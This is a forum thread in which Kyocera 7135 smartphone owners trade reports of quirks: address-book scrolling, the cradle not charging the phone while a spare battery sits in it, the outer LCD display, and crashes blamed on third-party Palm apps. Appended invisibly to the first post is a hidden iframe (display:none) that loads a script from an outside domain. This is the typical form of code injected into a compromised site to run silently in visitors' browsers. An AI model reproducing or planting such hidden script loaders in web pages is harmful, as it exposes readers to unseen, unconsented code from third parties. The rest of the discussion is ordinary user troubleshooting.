+ Reply to Thread

I found two new bugs or quirks

I've had my 7135 one week now. I've found several bugs, and the most recent I discovered were yesterday. They are:

Address Book
    I can no longer scroll down page by page in the address book by clicking the down button on the center navigator button. Instead, as soon as I enter the Address Book app, the first entry is highlighted, and by clicking the down button, it moves to the next address book entry immediately below, instead of moving down a whole page. If I hit the clear key, it will remove the highlight from the entry, but as soon as I hit the down button again, it just highlights the entry again, preventing me from scrolling down page by page. This makes a quick scroll through the Address Book very tedious. It worked fine a few days ago when I first got the phone.

Battery Charger in Cradle
    Sometimes, after I've used the phone or PDA a bit out of the cradle, when I put the 7135 back in the cradle, it starts charging. I know this because the battery icon starts its charging cycle animation. This would seem like normal behavior to me. However, other times I put the phone back in the cradle after I've used it a while, the battery does not start charging again, even though I know I've definitely used some of the battery charge. The reason I know it is not charging is because the battery icon (at the top of the phone screen) is not showing its animated charging cycle. It just shows fully charged, which I know it can't be.

Is anyone having the same issues? Could anyone test these issues with their own 7135 and let me know their results?

Thanks in advance for any help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

If you hold down the scroll it will go by page rather than by entry.
    The one who dies with the most toys WINS :-)

Originally posted by skicheer12
    If you hold down the scroll it will go by page rather than by entry.
    Has anybody figured out the opposite situation for the launcher? I know that Treo's let you highlight each app on the launcher by pressing up & down instead of scrolling the view & then hit enter to start the app.... so why can't we do this with the up, down & ok??
    iPhone therefore iAm.

Man... I can't believe I'm the only one that's a bit put off by this. It would seem that a lot of us are experiencing no errors/crashes out of the box, only to have errors pop up after a few days of ownership. I would attribute it to an accumulation of 3rd-party apps except for the fact that taking these apps off or even hard resetting the phone to factory defaults doesn't stop the crashing. Anyone care to hazard a guess as to why these things are acting like time bombs?

MEast

OK, here's a new one:
    I programmed the soft phone key (on the graffiti pad) to launch the "Message" application. It works fine for that, except when I am in the Phone application. At that time, it will bring me back to the most recently used application prior to entering the phone mode (ie: ToDo list, or Address Book). Only a second tap would then bring me to the Message app. Of course, if the Message app was the most recently used app, it would bring me back there.
    Strange?

Originally posted by GalenMD
    OK, here's a new one:
    I programmed the soft phone key (on the graffiti pad) to launch the "Message" application. It works fine for that, except when I am in the Phone application. At that time, it will bring me back to the most recently used application prior to entering the phone mode (ie: ToDo list, or Address Book). Only a second tap would then bring me to the Message app. Of course, if the Message app was the most recently used app, it would bring me back there.
    Strange?
    I don't think it's an error in the software. It has different functionallity based on if you are in phone mode or palm mode. When you change the key under PDA prefs, it's not affecting the functionallity for the phone mode. When in phone mode, it probably will always toggle you back to the last palm app.

The user guide is woefully inadequate as anybody can guess. I work in a business where documentation is the last thing you worry about even though that's a bad mistake.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Yeah, what Nick said. :>

Just tap the phone icon icon after you're back in PDA mode.

And regarding Jeremy's first post above, the address book on my January vintage 7135 works the same way. Click to move down by one address, hold to move down by page. If it worked differently, you wouldn't be able to highlight an individual name on the page would you? My only complaint is that the button is so sensitive that it seems nearly impossible to avoid scrolling down by a page PLUS a name, going past the name at the top of the page so that you then have to go back to the previous page if you want that top name.

jeh

Re: I found two new bugs or quirks

Originally posted by Jeremy
    [Battery Charger in Cradle
    Sometimes, after I've used the phone or PDA a bit out of the cradle, when I put the 7135 back in the cradle, it starts charging. I know this because the battery icon starts its charging cycle animation. This would seem like normal behavior to me. However, other times I put the phone back in the cradle after I've used it a while, the battery does not start charging again, even though I know I've definitely used some of the battery charge. The reason I know it is not charging is because the battery icon (at the top of the phone screen) is not showing its animated charging cycle. It just shows fully charged, which I know it can't be.

Is anyone having the same issues? Could anyone test these issues with their own 7135 and let me know their results?
    Is it possible that it's charging a second battery?

I've noticed that if you put the phone in the cradle while the cradle is charging a second battery, it does not try to charge the phone until the second battery is all charged. I can understand that.

What is very strange though is that the phone does not "know" that it's in the cradle at that time, so it turns off the Palm and the display after whatever the timeout period is set to. I sure hope the phone side at least is powered from the cradle during that time...

Remove the second battery and the phone resumes charging its internal battery, and it realizes it's in the charger.

Put the second battery back in and it goes back to "I think I'm out of the cradle" mode.

I'll have to wait and see what happens when the second battery is all charged.

Edit: Ok, the LED on the cradle turned green, so I guess that means the second battery is all charged. Still, the phone does not think it's in the cradle. This sucks! What am I supposed to do - get a SECOND cradle to leave the second battery in, if I want the phone display on all the time?

Administrator
    the 6035 (and i300, i330 for that matter) all charge the phone first, then the second battery. the phone should have priority over the second battery. i thought thats how it was with virtually every similar phone charging base, no?

Here is a quirk. There is no control over the LCD read out on the top of the unit. If I miss a call the missed message stays there until I open the phone, go to the phone and acknowledge it. Therefore I cant scoll to see who I missed or get back to the clock which I use as my main time piece. Also in dark, can not light up the lcd to see the messages or clock. Am I missing a button on the outside of the unit?

Segseg, nope. Not that I am aware of. This is also mentioned in some other post about things people do not like about the phone.
    Walt

Re: Re: I found two new bugs or quirks

Originally posted by jeh
    Is it possible that it's charging a second battery?
    Remove the second battery and the phone resumes charging its internal battery, and it realizes it's in the charger.
    Put the second battery back in and it goes back to "I think I'm out of the cradle" mode.
    This sucks! What am I supposed to do - get a SECOND cradle to leave the second battery in, if I want the phone display on all the time?
    I noticed the same strange design issue. The funny thing is, on the first day I had the phone I put the spare battery in the holder, then cradled the phone. The phone battery charged up - so, I'm guessing that the way this works is that the phone battery has priority until its fully charged (as documented in the Kyo manual) - then the spare gets charged and the phone gets either nothing or a trickle charge. I'm curious to see what happens when the phone battery charge drops a bit - it seems to be constant at 100%, though the circuitry in the device obviously thinks its not getting any external power as the 'charge' icon is not lit and the backlight times out. Maybe the trickle charge is enough to offset the battery drain but not high enough voltage to force a charge into the battery and so trigger the 'charging' icon and always-on backlight.

I've set the backlight to 'always on when open' and am leaving the phone open. I'll keep an eye on Launcher X's battery status indicator see what happens.

Ken

Never involved in a flame war! sputnik's Avatar
    i find that if i hit volume up or volume down then the LCD backlight goes on, with additional presses of these buttons adjusting the volume

and in verifying this behavior, i found that when you adjust the ringer volume with the flip closed, you can actually see the level on the LCD...thanks for making me find this

Originally posted by segseg
    Here is a quirk. There is no control over the LCD read out on the top of the unit. If I miss a call the missed message stays there until I open the phone, go to the phone and acknowledge it. Therefore I cant scoll to see who I missed or get back to the clock which I use as my main time piece. Also in dark, can not light up the lcd to see the messages or clock. Am I missing a button on the outside of the unit?
    _______
    Spu|nik VZW Kyo 7135 / VZW XV6600 / Sprint Mogul / Sprint Touch Pro / Sprint Touch Pro 2 / Apple iPhone 4 / ???

jeh
    > the phone should have priority over the second battery.

I agree completely that that is what SHOULD happen, but that isn't what I observed. The phone didn't even get trickle charge (enough to keep it from shutting down the Palm section and backlight). Worse, this situation didn't change even after the "second battery" LED turned green. As long as there was a second battery in the cradle, fully charged or not, the phone didn't "know" it was in the cradle and its battery was not charged.

Now here it is the next day, and it's acting more normally - phone and 2nd battery are in the cradle, 2nd battery is charged, and the phone is acting properly. I'll have to experiment some more...

Originally posted by meast
    I would attribute it to an accumulation of 3rd-party apps
    Exactly! I'm going to limit what I put in there...

Originally posted by RUYORK
    Exactly! I'm going to limit what I put in there...
    I'm going to limit what I put in there too..... limit it to whatever I can possibly fit in the 16MB of RAM and on my 256MB SD card that is :p

It does concern me though that some people are having excessive problems.
    Please visit my picture site: Robert-O-Rama :)

jeh
    Yeah. I don't believe "don't install 3rd-party apps" is a reasonable answer (if indeed it's an answer at all). Part of the great appeal of the Palm platform is the huge variety of 3rd-party apps. If there are serious compatibility problems with very many of them, problems that don't exist on other Palm platforms, then this phone just isn't a very good Palm.

Originally posted by jeh
    Yeah. I don't believe "don't install 3rd-party apps" is a reasonable answer (if indeed it's an answer at all). Part of the great appeal of the Palm platform is the huge variety of 3rd-party apps. If there are serious compatibility problems with very many of them, problems that don't exist on other Palm platforms, then this phone just isn't a very good Palm.
    3rd party apps are meant to be used on the Palm Platform of course.

The Palm Platform integrated with a phone causes some of these apps to crash much more often than they would if the OS wasn't trying to juggle around an integrated phone operations also...

Remember the 33mhz processor has to also process phone information also. That's why the phone is also affected when trying to overclock the CPU.

I'm not saying that nobody should use 3rd party apps but some may cause problems.

I plan on using them!

Originally posted by RUYORK
    3rd party apps are meant to be used on the Palm Platform of course.

The Palm Platform integrated with a phone causes some of these apps to crash much more often than they would if the OS wasn't trying to juggle around an integrated phone operations also...

Remember the 33mhz processor has to also process phone information also. That's why the phone is also affected when trying to overclock the CPU.

I'm not saying that nobody should use 3rd party apps but some may cause problems.

I plan on using them!
    I was under the impression the Phone-side had its own chip Isn't that so?
    iPhone therefore iAm.

Originally posted by Steve
    I was under the impression the Phone-side had its own chip Isn't that so?
    Overclocking the Dragonball does affect the overall operation of the unit...

What's the difference? Who cares. Put in it what you want, I am.